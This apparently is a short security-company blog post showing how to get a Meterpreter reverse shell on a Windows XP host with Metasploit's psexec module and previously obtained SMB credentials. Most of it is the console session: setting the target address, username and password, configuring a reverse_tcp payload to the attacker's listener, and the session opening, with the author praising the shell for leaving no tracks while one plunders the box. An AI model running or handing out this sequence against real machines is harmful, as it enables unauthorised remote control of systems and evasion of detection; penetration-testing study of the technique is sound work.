Talk to a Security Expert Now: (800) 721-9177

Get a Meterpreter Shell Using SMB Credentials

The Meterpreter shell in Metasploit is a fantastic way to interact with a compromised box. It runs entirely in memory and leaves no trace of itself after you disconnect, allowing you to pillage and plunder cleanly without leaving any tracks.

I find myself using it fairly frequently against Windows machines that I’ve already gotten credentials for via some other means. In those cases it doesn’t make sense to use an actual exploit to get a Meterpreter shell going.

Use the psexec exploit (which actually isn’t an exploit, but whatever) to accomplish this:

msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set rhost 10.10.0.122
rhost => 10.10.0.122
msf exploit(psexec) > set smbpass Changem3
smbpass => Changem3
msf exploit(psexec) > set smbuser mark
smbuser => mark
msf exploit(psexec) > show options

Module options (exploit/windows/smb/psexec):

Name       Current Setting  Required  Description
----       ---------------  --------  -----------
RHOST      10.10.0.122      yes       The target address
RPORT      445              yes       Set the SMB service port
SMBDomain  WORKGROUP        no        The Windows domain to use for authentication
SMBPass    Changem3         no        The password for the specified username
SMBUser    mark             no        The username to authenticate as

Payload options (windows/meterpreter/reverse_tcp):

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique: seh, thread, process, none
LHOST     10.10.0.149      yes       The listen address
LPORT     4444             yes       The listen port
msf exploit(psexec) > exploit

[*] Started reverse handler on 10.10.0.149:4444
[*] Connecting to the server...
[*] Authenticating to 10.10.0.122:445|WORKGROUP as user 'mark'...
[*] Uploading payload...
[*] Created OUBfKBZr.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:[email protected]_np:10.10.0.122[sv
cctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:[email protected]_np:10.10.0.122[svcc
tl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (PWFeuNyE - "MthJLAgTDPzWvZXfaw")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Sending stage (749056 bytes) to 10.10.0.122
[*] Deleting OUBfKBZr.exe...
[*] Meterpreter session 1 opened (10.10.0.149:4444 -> 10.10.0.122:1052) at 2011-
03-13 17:08:13 -0700
meterpreter > sysinfo
Computer   : EARTH
OS         : Windows XP (Build 2600, Service Pack 3).
Arch       : x86
Language   : en_US
Meterpreter: x86/win32

File and Print Sharing (445/tcp) needs to be enabled on the target host (duh) or this obviously won’t work.

Related Posts

A bad Apple…

This week iPad owners had their emails leaked via a security vulnerability in the way…

Disable Storage of the LM Hash

Also known as the LanMan, or LAN Manager hash, it is enabled by default on all Windows client and server versions up to Windows Server 2008 where it was finally turned off by default.
This Post Has 0 Comments

Leave a Reply

Your email address will not be published. Required fields are marked *

Back To Top